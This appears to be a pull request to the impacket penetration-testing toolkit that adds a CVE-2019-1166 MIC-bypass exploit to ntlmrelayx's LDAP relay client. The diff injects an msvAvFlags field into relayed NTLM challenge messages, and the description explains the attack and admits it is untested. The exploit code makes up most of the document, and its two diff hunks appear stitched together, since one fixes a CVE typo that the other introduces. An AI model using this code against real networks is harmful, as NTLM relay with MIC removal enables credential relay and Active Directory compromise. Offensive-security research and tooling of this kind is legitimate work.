### PR TITLE
Adding CVE-2019-1166

### DIFF
--- a/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py
@@ -97,7 +97,7 @@ class LDAPRelayClient(ProtocolClient):
                     if result['result'] == RESULT_SUCCESS:
                         challenge = NTLMAuthChallenge()
                         challenge.fromString(result['server_creds'])
-                        # This section will exploit CVE-1040-1166 by injecting an 'msvAvFlag' into the CHALLENGE_MESSAGE.
+                        # This section will exploit CVE-2019-1166 by injecting an 'msvAvFlag' into the CHALLENGE_MESSAGE.
                         if self.serverConfig.remove_mic:
                             av_pairs = AV_PAIRS(challenge['TargetInfoFields'])
                             avFlagsPair = pack("<I", 0)

--- a/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py
@@ -18,6 +18,7 @@
 #
 import sys
 from struct import unpack
+from struct import pack
 from impacket import LOG
 from ldap3 import Server, Connection, ALL, NTLM, MODIFY_ADD
 from ldap3.operation import bind
@@ -96,6 +97,19 @@ class LDAPRelayClient(ProtocolClient):
                     if result['result'] == RESULT_SUCCESS:
                         challenge = NTLMAuthChallenge()
                         challenge.fromString(result['server_creds'])
+                        # This section will exploit CVE-1040-1166 by injecting an 'msvAvFlag' into the CHALLENGE_MESSAGE.
+                        if self.serverConfig.remove_mic:
+                            av_pairs = AV_PAIRS(challenge['TargetInfoFields'])
+                            avFlagsPair = pack("<I", 0)
+                            new_av_pairs = AV_PAIRS()
+                            new_av_pairs[NTLMSSP_AV_FLAGS] = avFlagsPair
+
+                            for key in av_pairs.fields.keys():
+                                new_av_pairs[key] = av_pairs.fields.get(key)[1]
+
+                            challenge['TargetInfoFields'] = new_av_pairs.getData()
+                            challenge['TargetInfoFields_len'] = len(new_av_pairs.getData())
+                            challenge['TargetInfoFields_max_len'] = len(new_av_pairs.getData())
                         return challenge
                 else:
                     raise LDAPRelayClientException('Server did not offer NTLM authentication!')


### PR DESCRIPTION
Currently, ntlmrelayx.py will try to bypass MIC only exploiting CVE-2019-1040. In this article https://www.preempt.com/blog/active-directory-ntlm-attacks/ by preempt, it's detailed CVE-2019-1166 a.k.a "drop the mic 2". 
Here the code I added, will try to exploit CVE-2019-1166, by modifying the TargetInfo structure inside the NTLM_CHALLENGE message, by adding the ‘msvAvFlag’ field (variable avFlagsPair), and then will update the length of the structure.
To be honest during the tests with wireshark i noticed that the field was correctly injected but the client didn't echo it back into the NTLM_AUTHENTICATE message, probably due to a patched windows version i was using. 
So i don't have a proof of it even if seems to be compliant to the article. Anyway the modifications doesn't affect the correct exploitation of CVE-2019-1040.
I'm just student, so i could have misunderstood some things, in that case, if you can, let me know what mistakes i've done, just to learn.